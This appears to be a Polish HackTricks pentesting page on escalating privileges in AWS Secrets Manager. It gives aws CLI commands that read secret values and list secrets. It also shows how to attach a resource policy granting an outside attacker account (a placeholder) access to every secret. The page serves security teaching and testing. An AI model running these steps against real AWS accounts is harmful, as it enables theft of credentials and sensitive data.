AWS - Secrets Manager Privesc

Wesprzyj HackTricks

Secrets Manager

Aby uzyskać więcej informacji na temat menedżera sekretów, sprawdź:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Atakujący posiadający to uprawnienie może uzyskać zapisaną wartość wewnątrz sekretu w AWS Secrets Manager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencjalny wpływ: Dostęp do bardzo wrażliwych danych przechowywanych w usłudze AWS Secrets Manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Dzięki powyższym uprawnieniom możliwe jest udzielenie dostępu innym podmiotom/kontom (nawet zewnętrznym) do secrets. Należy zauważyć, że aby odczytać zaszyfrowane secrets za pomocą klucza KMS, użytkownik musi również mieć dostęp do klucza KMS (więcej informacji na stronie KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
Wesprzyj HackTricks

Last updated